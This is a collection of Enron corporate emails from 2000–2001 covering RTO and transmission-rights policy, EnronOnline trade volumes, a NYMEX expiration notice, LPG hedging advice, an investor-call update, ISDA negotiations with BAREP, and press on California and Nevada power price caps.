PJM system could be the core of a proposal but we should specific modifications to address our concerns. On the transmission rights issue, for instance, a simple "don't allocate" solution won't work. The lack of the secondary market for NY TCCs or PJM FTRs goes both to the lack of information and to the way the rights are defined. If as Harvey Reed suggests, RTOs can submit alternative approaches, at least there will be pressure to get moving. I have not discussed this idea with West Power. It then occurred to me that FERC is unlikely to impose a standard tariff without a rulemaking proceeding. Whether they could act by fiat or not is a moot point, since I doubt that they would do so without creating a record. There are two possible down sides to a rule making. (1) The outcome of a rulemaking is something of a crap shoot. The incumbents have a pretty good record in the past, of coming out of rulemakings with plenty of goodies such as the native load exemption in Order No. 888. There is a also a distinct risk that PJM's ICAP or transmission right allocation process is given blessed status, which will make revision of them later to be a huge uphill battle. (2) The other consequence of a rulemaking its effect on current RTO discussions. The best outcome is that the uncertainty of the rulemaking creates an urgency to get a proposal filed before a new FERC rule cuts off options from a new the standard for review. The uncertainty prior to the issuance of Order No. 888 in fact had that effect in the West. On the other hand it can mean that nothing happens until the new rule is issued. This also happened prior to Order No. 888, with a number of companies sitting on their hands, using the time delay to protect existing positions, while whipping up State regulators' fears of jurisdictional shift as necessary to boost their own position. These are only own views. I have not had a chance to speak with West Power this week, but I will approach Tim when I am in Portland again next week. Steve Christi L Nicolay 06/19/2001 04:21 PM To: Steve Walton/HOU/ECT@ECT cc: James D Steffes/NA/Enron@ENRON, Richard Shapiro/NA/Enron@Enron, Sarah Novosel/Corp/Enron@ENRON, Steven J Kean/NA/Enron@Enron Subject: Re: INTERIM MODEL TALKING POINTS Can we focus the PJM language as an interim fix toward the East (while maybe the threat of PJM in the West will make the West RTOs act quickly and adopt everything that Steve W. has been advocating). Also, I agree with the ISO being required to provide much greater information on where the congestion occurs. While the allocation of FTRs is a problem and the idiosyncratic nature is also a problem, it is because the traders do not have access to all the information. They have told me that if they had access to all the information about congestion from the past several years, they could essentially build a model for anticipated congestion that could trade "above" the underlying FTRs as financial instruments. Steve Walton 06/18/2001 03:30 PM To: James D Steffes/NA/Enron@ENRON cc: Christi L Nicolay/HOU/ECT@ECT, Richard Shapiro/NA/Enron@Enron, Sarah Novosel/Corp/Enron@ENRON, Steven J Kean/NA/Enron@Enron Subject: Re: INTERIM MODEL TALKING POINTS Jim, I have added my comments to your draft. My concern with the "Adopt PJM" approach is that it will become a fiat accompli with regard to congestion management. and the nature of future transmission rights. Once adopted as the standard, nothing else will be accepted and any move to a decentralized approach is highly unlikely. Unlike the British, we have a hard time changing horses because of our multi-jurisdictional Federal system of government. The PJM's lack of a secondary FTR market is more that just an allocation problem. If that were true, they New York would have a secondary market -- none exists there either. The unpredictability of prices is probably the biggest problem since no one knows how to value FTRs or TCCs. I think the nature of instrument is also not particularly helpful. During our discussion of Seabron Adamson's last draft, I maintained that a centralized unit commitment process didn't fit the Pacific Northwest (PNW) with its pattern of trading to achieve coordination between hydroelectric and thermoelectric generation. You asked me to provide more detail hydro-thermal operation. I am including a paper that covers the nature of PNW operations and contracting with observations about the nature of unit commitment. Given other work and travel, it has taken some time to complete the paper and its examples. I hope this will help to explain why I am hesitant to endorse a centralize unit commitment implementation. Steve James D Steffes@ENRON 06/18/2001 01:48 PM To: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Christi L Nicolay/HOU/ECT@ECT, Sarah Novosel/Corp/Enron@ENRON, Steve Walton/HOU/ECT cc: Subject: INTERIM MODEL TALKING POINTS Here is the draft of an Interim step for Enron to give to Lay. Please give me your comments. This is CONFIDENTIAL and should not be shared outside the company. Jim
The revision is to US Natural Gas Financial Volumes. Sorry about any inconvenience. jr EnronOnline Trade Counts and Volume for May 15, 2001 EXTERNAL INTERNAL TOTAL COUNTRY COMMODITY CATEGORY COUNT QTY COUNT QTY COUNT QTY UNIT OF MEASURE Austria Power Physical 15 8,518 - - 15 8,518 MWh Belgium Natural Gas Physical 3 255,000 - - 3 255,000 MMBtu Canada Natural Gas Financial 7 4,270,000 1 155,000 8 4,425,000 MMBtu Canada Natural Gas Financial Option 1 883,500 - - 1 883,500 MMBtu Canada Natural Gas Physical 223 8,207,274 3 2,595,000 226 10,802,274 MMBtu Canada Power Financial 2 3,121 1 24 3 3,145 MWh (Canada) Germany Coal Physical 1 9 1 9 2 18 SECA Contract - Metric Tonnes Germany Power Physical 101 679,551 - - 101 679,551 MWh Japan Metals Physical 1 6 - - 1 6 Jpn Alum Phy 250 mt Lot Norway Power Financial 13 281,160 - - 13 281,160 MWh Singapore Crude Financial 1 50,000 - - 1 50,000 Barrel Singapore Oil Products Financial 2 66,000 - - 2 66,000 Barrel Switzerland Power Physical 15 11,361 - - 15 11,361 MWh United Kingdom Crude Financial 3 300,000 2 50,000 5 350,000 Barrel United Kingdom LPG Financial 2 3,000 - - 2 3,000 mt United Kingdom Metals Financial 473 22,950 71 1,700 544 24,650 LME Registered mt Lot United Kingdom Natural Gas Physical NBP 105 13,847,850 6 60,700 111 13,908,550 MMBtu United Kingdom Oil Products Financial 4 60,000 - - 4 60,000 Barrel per month United Kingdom Oil Products Financial 13 65,000 - - 13 65,000 IPE mt United Kingdom Power Physical 13 413,280 - - 13 413,280 MWh United Kingdom Sea Freight Financial 1 15 1 15 2 30 Sea Freight Lots USA Crude Financial 192 8,970,000 93 3,950,000 285 12,920,000 Barrel USA Crude Financial Option 2 100,000 6 300,000 8 400,000 Barrel USA Crude Physical 9 973,000 - - 9 973,000 Barrel USA Gas Pipeline Capacity Physical 3 24,200 - - 3 24,200 MMBtu USA LPG Financial 4 65,000 1 25,000 5 90,000 Gallon USA LPG Physical 2 10,000 - - 2 10,000 Gallon USA Lumber Physical 1 2 - - 1 2 Thousand Board Feet USA Natural Gas Financial 1,215 516,997,085 639 226,751,077 1,854 743,748,162 MMBtu USA Natural Gas Financial Option 71 71,010,000 6 6,000,000 77 77,010,000 MMBTU USA Natural Gas Physical 1,811 18,988,668 49 306,117 1,860 19,294,785 MMBtu USA Oil Products Financial 29 768,572 - - 29 768,572 Barrel USA Paper Physical 1 24 - - 1 24 Short Tons (+/- 5%) USA Power Financial 52 321,905 15 176,028 67 497,933 MWh USA Power Physical 531 6,828,054 152 2,583,915 683 9,411,969 MWh USA Rate and Currency Financial - - 3 4,800,000 3 4,800,000 EUR/1 USA Rate and Currency Financial - - 9 784,000,000 9 784,000,000 FX USD USA Rate and Currency Financial - - 2 1,616,000 2 1,616,000 USD/1 USA Weather Financial 4 9 - - 4 9 Cooling Degree Day 4,926 1,061 5,987
Notice No. 01-85 March 13, 2001 TO: All NYMEX Division Members/Member Firms All NYMEX Division Clearing Members All NYMEX Division Floor Traders All NYMEX Division Operations Managers FROM: George Henderson, Vice President RE: Options Expiration Operational Procedures for the Trading Floor and Clearing Members ________________________________________________________________ The expiration date for the April 2001 options contract for Gasoline-Crack (CGJ1) and Heating Oil-Crack (CHJ1) is Monday, March 19, 2001. GENERAL OPERATIONAL PROCEDURES All Clearing Members and Qualified Floor Traders that carried an options position as of the close of business day prior to the expiration day, or engaged in trading activity on Expiration Day in the expiring options contract will be required to have a knowledgeable, duly authorized representative present at their normal work station promptly at 5:30 p.m. until released by the Exchange staff as specified below. All adjustments and/or corrections, must be accompanied by relevant supporting documentation prior to being incorporated into expiration processing, in essence making the expiration processing an extension of the afternoon trade resolution procedures. All input to the NYMEX Clearing Department will conclude no later than 30 minutes after floor representatives are released. Exchange Clearing (299-2110), Floor Trade Correction (299-2068 and 299-2169) personnel, as well as a representative of the Floor Committee will be available to assist with the processing of notices of Exercise and Abandonment, position transfers, trade corrections and other questions or problems you may have. CLEARING DEPARTMENT OPERATIONAL PROCEDURES The Option Expiration process is a screen based process for which all information is provided on the screens on C21 terminals. No Option Expiration Reports will be provided. The following screens will assist you through the Option Expiration process: MEMBER TRADE INQUIRY Contains real-time top day trade information, trade information for the previous 4 business days and trades adjusted for the previous 4 business days by adjustment date. SINGLE POSITION MAINTENANCE Contains a real-time snapshot for each option series from the start of day position to the projected end of day position. REVIEW ACCEPT REJECT TRANSFERS Contains all trade and position transfers "TO" your firm and the status of each transfer. REVIEW SUBMITTED TRANSFERS Contains all trade and position transfer "FROM" your firm and the status of each transfer. EXERCISE NOTICE SUBMISSION Contains your available long position and an input field to enter the number of long positions you wish to exercise. DO NOT EXERCISE SUBMISSION Contains your available long position and an input field to enter the number of long positions you wish to abandon. POSITION CHANGE SUBMISSION PCS may be submitted either by manual input or by electronic transmission. Any PCS input on a Clearing 21 terminal will be the input processed by the system. This input may be made at any time prior to 6:45 p.m. Any PCS input via transmission for that contract series will be disregarded. ALL POSITIONS ARE DEEMED FINAL Upon completion of all PCS input, all positions will be deemed final. EXERCISE/ASSIGNMENT INFORMATION Will be available to you on the Single Position Maintenance window by contract series or the Assignment List window which contains all your Assignments on one window. You will be notified of its availability by C21 E-Mail and by Fast Facts. This should occur within 1 hour of the last PCS input. All Clearing Members are required to have an authorized representative(s) at their C21 workstations in preparation for any communication during the expiration process. FAST FACTS Clearing Members should call the Fast Facts information service 301-4871, access code 700 for event messages advising Members of the event status. E-MAIL Clearing Members should read their C21 E-Mail messages immediately to be aware of event status. The standard event Fast Facts and/or E-Mail messages and the sequence in which they will be announced are: Standard Event Message: Announce Out-of-the Money Exercise and In-the-Money Do Not Exercise Submissions Approximate Time of Message Availability: 5:45 PM Usual Event Time: 5:45 PM Announced via Fast Facts Standard Event Message: Announce Final Input to C21 Cutoff Time Approximate Time of Message Availability: 6:30 PM Usual Event Time: 6:45 PM Announced via e-mail Standard Event Message: All positions are deemed final Approximate Time of Message Availability: 7:30 PM Usual Event Time: 6:45 PM Announced via Fast Facts Standard Event Message: Announce Exercise/Assignment Information Available on the Single Position Maintenance Windows Approximate Time of Message Availability: 8:25 PM Usual Event Time: 8:30 PM Announced via Fast Facts and e-mail Standard Event Message: All Report Distribution is completed Approximate Time of Message Availability: 11:00 PM Usual Event Time: 11:00 PM Announced via Fast Facts The times appearing in the Usual Event Time column are based on normal operational conditions and could vary. NYMEX EXPIRATION DAY PROCESSING OVERVIEW OF MEMBER REQUIREMENTS Time: 5:30 PM Activity: Exercise Notice Submission Event: Input to C21 Cutoff Time Reference Number: 1 Time: 5:30 PM Activity: Do Not Exercise Submission Event: Input to C21 Cutoff Time Reference Number: 2 Time: 5:45 PM Activity: Announce Out-of-the-Money Exercise and In-the-Money Do Not Exercise Submissions Event: Fast Facts Notice Reference Number: 3 Time: 6:30 PM Activity: Announce Final Input to C21 Cutoff Time Event: C21 E-mail Reference Number: 4 Time: 6:45 PM Activity: Final Input to C21 Cutoff Time Reference Number: 5 Time: 7:30 PM Activity: All Positions are Deemed Final Event: Fast Facts Notice Reference Number: 6 Time: 8:25 PM Activity: Announce Exercise/Assignment Information Available on the Single Position Maintenance Windows Event: Fast Facts Notice and C21 E-mail Reference Number: 7 If you have any questions concerning these procedures, please contact Charles V. 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Mariella, You are much better at this than you think. Anytime you have an idea that you'd like me to consider or any questions, feel free to bring me into the loop. Did you notice in your e-mail that you now have an EnronOnline ID and Password? I can show you how to access it and find the quotes you need when you are ready. Paul P.S. Have a great weekend!!! -----Original Message----- From: Mahan, Mariella Sent: Friday, September 28, 2001 1:34 PM To: Y'Barbo, Paul Subject: RE: Procaribe's next cargo thanks so much teacher; I truly appreciate your feedback/thoughts. I think the Progasco thing is a good point; we shall consider it. Thanks a lot again. Mariella ps: sorry if I'm a bit slow on these things but I'm just now getting used to thinking on these terms. -----Original Message----- From: Y'Barbo, Paul Sent: Thursday, September 27, 2001 5:06 PM To: Mahan, Mariella Subject: RE: Procaribe's next cargo -----Original Message----- From: Mahan, Mariella Sent: Thursday, September 27, 2001 10:55 AM To: Maltes, Miguel Cc: Melinchon, Ermes; Y'Barbo, Paul; Tortolero, Elio; Zatarain, Brian Subject: Procaribe's next cargo Miguel, As we analyze what and how to deal with your next cargo requirements, we need the following information: - Current levels of inventory at Procaribe, broken down between your own and Eco's product - projected as of end of September (please provide basis; i.e., levels of as of the actual date that you provide data plus your projections through end of the month on withdrawals/uses) - Projected sales volumes for the months of October, November, December and January of next year, including (and this is very critical!) the basis for your projections. I am going to be interested in looking at your assumptions for both Progasco (now Tropigas) and Empire volumes, if any. - Please ensure that your San Juan Gas volumes have been signed off by Federico. We need this data as soon as you can so that we can begin to look at cargo options and/or evaluate the decision to borrow from Eco. Thanks and Regards, Mariella Paul, Believe it or not (yes, call me crazy!), I went home last night and continued to study the examples of hedging you were so kind to walk us through and arrived at the following conclusions, which I would like for you to correct me on and/or confirm my thought process. - First, given the added uncertainty of Procaribe's volumes (sales) now that Progasco is owned by someone else, unless Miguel can guarantee (through some form of written agreement) that he will have Progasco's volumes, I think we should be more open to or more inclined to borrow Eco's volumes (clearly, we wouldn't do so if the curve looks awful - then it becomes an issue of cash flow vs. product pricing optimization). [Y'Barbo, Paul] Without the Progasco volume, it will take much longer to sell-off this cargo. The hedging would be different. If Humberto unexpectedly showed up to buy, the timing of our hedge would be off. I think we should sign-up Humberto for Nov-Dec at whatever we can get. Come January it will be a new ballgame as Empire will need to get a new contract with PDVSA. We could probably up our price at that time. - Second, it seems to me that you wouldn't me too inclined to try to fix the cost of your product bought from, say, PDVSA, unless you are very concerned about an increasing curve (right around the 3 days surrounding the bill of lading) that will not necessarily stay long enough to keep your "sales" curve up to guarantee a margin. In fact, you would likely wait and continue to watch the curve and either not act at all or act shortly before the bill of lading dates. Now, in your May hedging example, if you actually compare the hedged vs. non-hedged results, it tells you that you were better off with a no hedge on the earlier months (month for which data on the revenue side was known and most of the curve deciding your price to PDVSA was also known). Then, my question is: why did we decide to hedge that volume when the hedge was put in place on 5/9, only a week or so before the actual bill of lading date? Do you remember what was concerning us? [Y'Barbo, Paul] You would hedge the purchase cost if you were going to be repaying borrowings and you liked the price you could lock-in. Also, as you say, if you were concerned that prices during your sales period would not hold their value relative to the 3-days around B/L. Yes, we missed $0.003/gallon by hedging the part of the cargo that was sold in April and early May. We were not particularly concerned about anything. Just wanted to be rid of the possibility that prices could have gone up a penny or two. - Third, it seems to me that, on the May hedge, (the second part of the volume) someone lost big time - I could be wrong, but what I'm looking at is the fix we got (Suzanne got) in return for the floating; the fix rate was much higher than the actual MBv figures for the months of June and July (this assumes of course the Enron didn't turn around and laid off that risk on someone else). What I am trying to say is that, there appears to have been something going on with the curve on or around 5/21 that changed dramatically once actual figures were recorded. Do you remember? [Y'Barbo, Paul] LPG prices dropped dramatically in June going below $0.35 per gallon. Normally, no one in Enron would get hurt because Lee Jackson would have hedged himself with someone outside of the company. However, he actually left his position open and lost about $300k. That does not impact us. - Fourth, it seems to me that your swaps were being built around a primary objective (beyond risk protection): to deliver approximately 5 cents per gallon margin to Miguel. Anytime we have that opportunity, we should grab it. [Y'Barbo, Paul] Yes, I want to lock the margin but if possible I like to improve it to above the $0.05. That's all for now - - I'll keep studying this ... What I am trying to do is draw some conclusions as to the circumstances under which we will want to swap the purchase cost (it's clear to me that, most of the times, once you know what your cost is, you will try to lock in your margin by doing a swap using your revenue stream; i.e., the Mbv basis). Thanks again for all your time and patience. Mariella
Today, Enron hosted a conference call to give investors a current overview of the company. Here's an update of what we discussed during the call. We told investors that we're doing everything we can to protect their interests and to regain their confidence. Our focus remains on our credit quality, balance sheet and liquidity, which are essential for our continued success and expansion of our wholesale businesses. It took more than a few weeks to get where we are today. Here's a snapshot of significant events that led to our current situation: -- In hindsight, we definitely made some very bad investments in our non-core businesses over the past several years. Those include investments in Azurix, India and Brazil. They have performed far worse that we could have ever imagined when we made these investments; -- Because of these bad investments, we've become over-leveraged as a company. The negative impact of those investments was exacerbated through the extensive use of debt capital both on and off our balance sheet; -- We also entered into related party transactions that led to a loss of investor confidence, which has been very damaging; -- We've been criticized for our lack of transparency and our hard-to-understand financial and operating disclosures; and -- On top of it all, we discovered errors in our financial statements, as discussed in our 8-K filing last week, that required a restatement of previously reported earnings. We've taken a new look at our businesses and have separated them into three areas: core businesses, non-core businesses, and businesses under review. Core Businesses Our core businesses remain strong and consistent sources of significant earnings and cash flows for the company. They're our competitive advantage. These include: -- Natural gas pipeline businesses; -- Gas and power businesses in North America and Europe; -- Retail businesses in North America and Europe; and -- Coal businesses in North America and Europe. The events of the past few weeks have had a temporary negative impact on our projected fourth quarter profitability. It's too early to tell at this time what impact this might have on our operating results. We are considering these actions now so that we can quickly return to normal business in 2002. I also remain optimistic that the actions we've taken over the past couple of weeks have addressed our customer and counterparty credit and liquidity concerns. According to our business unit leaders, we have definitely seen improvement in our counterparty relationships. Non-Core Businesses Our non-core businesses include our global assets group and our broadband division. We have invested more than $8 billion in these businesses, and the return from them has been dismal. We have an aggressive program in place to exit these businesses and expect that the sale of these businesses will generate billions of dollars in cash that we can use to repay debt and reinvest in our core businesses. We already have more than $800 million in assets contracted for sale this year. They include CEG Rio, a gas LDC in Brazil; EcoElectrica, a power plant and LNG receiving terminal in Puerto Rico; and asset sales of offshore oil and gas properties in India. The approximately $2.9 billion Portland General sale is also on target to close in late 2002 pending regulatory approvals. Businesses Under Review These businesses are comprised of those operations outside our power and gas wholesale businesses and include global and industrial markets. While several of these businesses have very strong future prospects, we need to determine if their capital requirements and near-term growth prospects are sufficient enough in terms of earnings and cash generation. Reviewing our businesses this way will help determine where we need to make reductions to our work force. More information will follow as soon as it becomes available. Credit Rating/10-Q Filing We continue to meet regularly with credit rating agencies and believe that our liquidity enhancements and scheduled asset sales will strengthen our balance sheet and maintain our investment grade credit rating. Our current credit ratings by the three major rating agencies are as follows: -- Moody's at Baa3 "Under Review for Further Downgrade" -- Fitch at BBB- "Evolving Status" -- S&P at BBB- "CreditWatch Negative" We also discussed our existing financial vehicles, including Osprey, Marlin and Yosemite, in further detail. We told investors that we will file our 10-Q five days late due to our current activities. It will be filed on Nov. 19. We will continue to have updates with investors over the coming weeks as well as our frequent updates with you. The full transcript of our conference call will be filed with the Securities and Exchange Commission in the next few days. It will also be posted on our web site at www.enron.com/corp/investors under "SEC Filings." In connection with the proposed transactions, Dynegy and Enron will file a joint proxy statement/prospectus with the Securities and Exchange Commission. Investors and security holders are urged to carefully read the joint proxy statement/prospectus regarding the proposed transactions when it becomes available, because it will contain important information. Investors and security holders may obtain a free copy of the joint proxy statement/prospectus (when it is available) and other documents containing information about Dynegy and Enron, without charge, at the SEC's web site at www.sec.gov. Copies of the joint proxy statement/prospectus and the SEC filings that will be incorporated by reference in the joint proxy statement/prospectus may also be obtained for free by directing a request to either: Investor Relations, Dynegy Inc., 1000 Louisiana, Suite 5800, Houston, TX 77002, Phone: (713) 507-6466, Fax: (713) 767-6652; or Investor Relations, Enron Corp., Enron Building, 1400 Smith Street, Houston, TX 77002, Phone: (713) 853-3956, Fax: (713) 646-3302. In addition, the identity of the persons who, under SEC rules, may be considered "participants in the solicitation" of Dynegy and Enron shareholders in connection with the proposed transactions, and any description of their direct or indirect interests, by security holdings or otherwise, are available in an SEC filing under Schedule 14A made by each of Dynegy and Enron.
There have been a lot of emails being circulated internally about BAREP and from BAREP. The current situation as I understand it is that ECTRIC, the Oslo Branch of ECTRIC and ENA all plan to enter or have entered into derivative transactions with BAREP. (I also understand that BAREP consists of two legal entities, one that sells options and one that buys options, although It is not clear to me how this split structure will come into play for the transactions each of the Enron entities may be interested in pursuing.) BAREP is prepared to sign ISDA Master Agreements with both ENA and ECTRIC and is actively looking to start negotiations. From a credit and legal perspective it is our preference to have only one Enron entity enter into a master with BAREP. If ECTRIC is the entity that will have the most contact with BAREP then it makes sense to have ECTRIC enter into the ISDA with BAREP. To the extent that ENA would like to trade with BAREP I would propose that ECTRIC enter into the trade directly with BAREP and then have ECTRIC either back to back the trade to ENA or otherwise account for the transaction back to ENA. (Pending execution of a master each Enron entity should continue to document transactions as they have been doing.) If this proposal makes sense to the rest of you I will need to know if it works from a regulatory and tax perspective. Steve, Janine, is there any reason why ENA would not be able contact the traders at ECTRIC to have them enter into a transaction with BAREP and then have them back to back the transaction to ENA? Please let me know if anyone else needs to give input into this issue or if there are any other concerns or issues that will need to be addressed to cover this situation. Thank you for your help. Brent Hendry. Martin Rosell@ECT 10/19/2000 02:22 AM To: Brent Hendry/NA/Enron@Enron cc: Tanya Rohauer/HOU/ECT@ECT Subject: ISDA Master Agreement between Enron North America and Banque de R,escompte et de Placement (BAREP) Can you clear such an arrangment with Tax, Trading and Documentation, I'm happy to play along. Please don't let this issue stop you from addressing the Barep docs matter. Thanks. Martin ---------------------- Forwarded by Martin Rosell/OSL/ECT on 2000-10-19 09:16 --------------------------- From: Brent Hendry@ENRON on 2000-10-16 11:59 CDT To: Martin Rosell/OSL/ECT@ECT cc: Tanya Rohauer/HOU/ECT@ECT Subject: ISDA Master Agreement between Enron North America and Banque de R,escompte et de Placement (BAREP) Martin, I am not sure who is pushing having two master agreements with Barep. From a legal and credit perspective it would be better to have one master in place and if the other Enron office wants to trade with Barep we can do it through the existing master and back to back the transaction internally. I do not mind having the master done from here but, unless there are factors I am not aware of, it would not make sense to split our credit with another master from London. Tanya do you have any insight on this issue? Let me know if you can why there is the push for two masters. Thanks, Brent ----- Forwarded by Brent Hendry/NA/Enron on 10/16/2000 11:56 AM ----- Martin Rosell@ECT 10/16/2000 11:52 AM To: [email protected] cc: Brent Hendry/NA/Enron@Enron Subject: ISDA Master Agreement between Enron North America and Banque de R,escompte et de Placement (BAREP) Radia, Thanks for your note below. Since Enron trades from different entities in North America and Europe, I assume that we're talking about two sets of contract, one between Enron North America Corp. ("ENA") and Barep and one between Enron Capital & Trade Resources International Corp. ("ECTRIC") and Barep. In order to avoid duplicating work, a way forward could be to let ENA and Barep conclude their contract, whereupon ECTRIC and Barep largely could replicate the terms between the former in their own ISDA master agreement. As to the ISDA between ENA and Barep, please forward your draft documentation to my colleague in Houston; Brent Hendry, on fax +1 713 853 3129. For your information, ECTRIC is a Delaware-incorporated company and a wholly-owned indirect subsidiary of Enron Corp. Regards, Martin Rosell ---------------------- Forwarded by Martin Rosell/OSL/ECT on 2000-10-16 18:39 --------------------------- Enron Capital & Trade Resources Corp. From: [email protected] 2000-10-16 12:34 To: [email protected] cc: [email protected], [email protected], [email protected] Subject: ISDA Master Agreement between Enron North America and Banque de R,escompte et de Placement (BAREP) Dear Mr Rosell : I am a legal counsel in charge of the negotiation of the Master Agreements. I refer to the last e-mails from my colleague Oriane Ch,neau addressed to Steven Vu in order to put an ISDA Master Agreement in place between our two companies. Before sending you our draft, we would be grateful if you could provide us the status of your company as soon as possible. The best for us is to send our draft today or tomorrow at the latest. Also, could you please confirm wether your fax number is well 00 47 2 310 25 50. Should you have any questions, do not hesitate to contact me. Thank you in advance for your reply. Best regards, Radia Djama Legal counsel Tel : 33 1 53 32 90 75 Fax : 33 1 53 32 91 21 ************************************************************************* Ce message et toutes les piSces jointes (ci-aprSs le "message") sont confidentiels et ,tablis . l'intention exclusive de ses destinataires. Toute utilisation ou diffusion non autoris,e est interdite. Tout message ,lectronique est susceptible d'alt,ration. La SOCIETE GENERALE et ses filiales d,clinent toute responsabilit, au titre de ce message s'il a ,t, alt,r,, d,form, ou falsifi,. ******** This message and any attachments (the "message") are confidential and intended solely for the addressees. Any unauthorised use or dissemination is prohibited. E-mails are susceptible to alteration. Neither SOCIETE GENERALE nor any of its subsidiaries or affiliates shall be liable for the message if altered, changed or falsified. *************************************************************************
----- Forwarded by Jeff Dasovich/NA/Enron on 07/06/2001 07:15 PM ----- > POWER POINTS:Nevada Suffers FERC Unintended Consequences > > By Mark Golden > A Dow Jones Newswires Column > > NEW YORK (Dow Jones)--Those who have opposed wholesale electricity price > controls have been labeled as extreme free-market ideologues who are > insensitive > to the practical impacts on peoples' lives of high electricity prices. > But the most common argument against price caps has been logical, not > ideological: Price controls have never worked. Market participants always > find a > way around the rules. > This week the Federal Energy Regulatory Commission decided that it will > have > to consider at its meeting next week revisions to its June 19 price > control > ruling. The initial price cap rule, set by the California Independent > System > Operator last spring, was only a few paragraphs long. Each successive > price cap > order has gotten longer, though effectiveness still appears out of reach. > The > FERC's April order was 28 pages long; the June order was 48 pages. And now > additional rules are on call to plug the new loopholes. > The revisions will also try to repair damage done to the market by the > June > order. During a spell of very hot weather Monday, Sierra Pacific Resources > (SRP) > subsidiary Nevada Power had to initiate limited rolling blackouts to a > small > number of customers for 45 minutes. The company attributed the blackouts, > in > part, to the new price controls. > Sierra Pacific's chief spokesman, Paul Heagen, provided a bird's eye > view of > the practical realities of the FERC's new price cap regime. > Power Points: After having a few days to look into it, can you say that > price > caps definitely contributed to blackouts in Nevada on Monday? > Paul Heagen: Yes, but first let me say that all of it was unintentional. > FERC > was trying to do the right thing. Price caps were a noble effort to solve > a real > problem in California. > But on Monday the market needed speed and clarity to function. It had > neither, > and that can be attributed to the price caps. Normally, in one or two > phone > calls we could have got what we needed. On Monday, we were five to six > calls > into it and still on the phone. > Price caps are having the unintended consequence of dragging other > states into > the California morass. We have this artificial environment which we are > all > trying to sort through. > PP: How, specifically, are the caps having this effect? > PH: There are a couple of elements. The 10% premium for power sold to > California is supposed to reflect concerns about credit. That 10% in an > open > market is no big deal, but in a constrained situation the seller will grab > it, > because now it's his only chance to make money. > Also, the way this is set up, they look backwards. They determine the > price > after the fact. I can't think of any business in the world where you sell > a > product and find out later what price you sold at. > This had a very chilling effect on people's willingness to sell. > Normally, a > cloud cover comes in and a utility has a little extra power to sell in the > real-time market. Normally, those little 50-megawatt packets move pretty > easily, > and that's really important for maintaining reliability. > With the price cap, utilities hunkered down. Selling at $92 wasn't worth > the > risk. They figured they might as well hang on in case they needed it. > Also, we have a voluntary curtailment program that allows us to share > savings > with customers who agree to curtail use. If the market is, say, $500, we > might > pay them $250/MWh to curtail demand. But in a $92/mkt, we can offer them > such a > small amount of money that they stay on. > PP: Have you talked to FERC about these problems with the price > controls? > PH: We've had a senior team in Washington, D.C., at the FERC since last > week. > Right away we saw another effect of the FERC order: It penalizes companies > like > ours that signed long-term supply contracts before the order because many > of > those deals were done at prices above the price cap. > The biggest issue for us, is, did FERC really mean to penalize companies > like > us that planned ahead? It's long-term contracts that provide price > stability. > It's unfair to our customers to expect them to pay for long-term > contracts > that have been undercut by price caps. If we get into a situation where we > have > a little extra to sell, now we can't recover our costs. > PP: With such high prices the past year, a lot of small, oil-fired > turbines > have been dusted off and put into service on time for this summer. Traders > for > other southwest utilities have said that all these little turbines have > been > very helpful when supplies got tight earlier in the year, but they weren't > available this week because they cost more to run than the price cap. Did > you > see the same thing? > PH: We have some small turbines that we put in Reno and the Lake Tahoe > area in > the last few months. They were supposed to provide peak power, but they > get > uneconomic in a hurry under the price cap scheme. > You know, we've tried to isolate ourselves as best we could from the > California situation and behave very independent of how California > behaves. So > Nevada is a great test case to see if price caps have an unintended effect > outside of California. We were able to minimize the impact on our > customers > Monday, but the situation has maximized the attention of the country on > the > impact of price caps. > -By Mark Golden, Dow Jones Newswires; 201-938-4604; > [email protected] > > (END) DOW JONES NEWS 07-06-01 > 03:14 PM- - 03 14 PM EDT 07-06-01 >
Start Date: 10/20/01; HourAhead hour: 24; HourAhead schedule download failed. Manual intervention required. LOG MESSAGES: PARSING FILE -->> O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001102024.txt !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data Error: dbCaps97Data: Cannot perform this operation on a closed database !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data Error: dbCaps97Data: Cannot perform this operation on a closed database !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. Alias: dbCaps97Data !!!Unknown database. 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Maybe you guys were, but I wasn't aware that DWR was doing this. Thus, the IOU default on the ISO grows. Sue Sue Mara Enron Corp. Tel: (415) 782-7802 Fax:(415) 782-7854 ----- Forwarded by Susan J Mara/NA/Enron on 02/08/2001 11:11 AM ----- "Ronald Carroll" <[email protected]> 02/08/2001 11:05 AM To: <[email protected]>, <[email protected]>, <[email protected]>, <[email protected]>, <[email protected]> cc: Subject: Fwd: DJ Calif/Power Purchases -2: DWR Ducking Its Duty -Reliant ----- Message from "Tracey Bradley" <[email protected]> on Thu, 08 Feb 2001 09:19:53 -0600 ----- To: "Paul Fox" <[email protected]> cc: "Andrea Settanni" <[email protected]>, "Jeffrey Watkiss" <[email protected]>, "Ronald Carroll" <[email protected]> Subject: DJ Calif/Power Purchases -2: DWR Ducking Its Duty -Reliant FYI - Testimony at the court hearing yesterday revealed that the DWR is making the California ISO cover the difference between the real-time power DWR finds appropriately priced and what the state needs to buy to prevent blackouts. The purchases by the ISO will then be billed to the state's three IOUs, two of which are not paying their bills. DJ Calif/Power Purchases -2: DWR Ducking Its Duty -Reliant Copyright , 2001 Dow Jones & Company, Inc. The issue came up in hearings on a lawsuit filed by the California Independent System Operator, which runs the state's transmission grid, against Reliant Energy (REI), which wants to be allowed not to sell power to California if the state won't guarantee that it will be paid. Reliant is concerned that it won't be paid for power being bought by the ISO on the utilities' - rather than the DWR's - behalf. "We're willing to sell to the DWR, but they're not willing to step up to the plate," said Terry Houlihan, an attorney with Reliant. "The DWR has money for short- and long-term power purchases. It can avoid the situation if it does what the state Legislature said. Then there would be no need for a restraining order." The court issued a restraining order Tuesday night requiring Reliant to sell power to California Wednesday, then extended the order for another day Wednesday night. The rapidly deteriorating creditworthiness of PG&E Corp. (PCG) unit Pacific Gas & Electric Co. and Edison International (EIX) unit Southern California Edison first left generators unwilling to supply power to California in mid-December, when the U.S. Department of Energy intervened with an emergency order 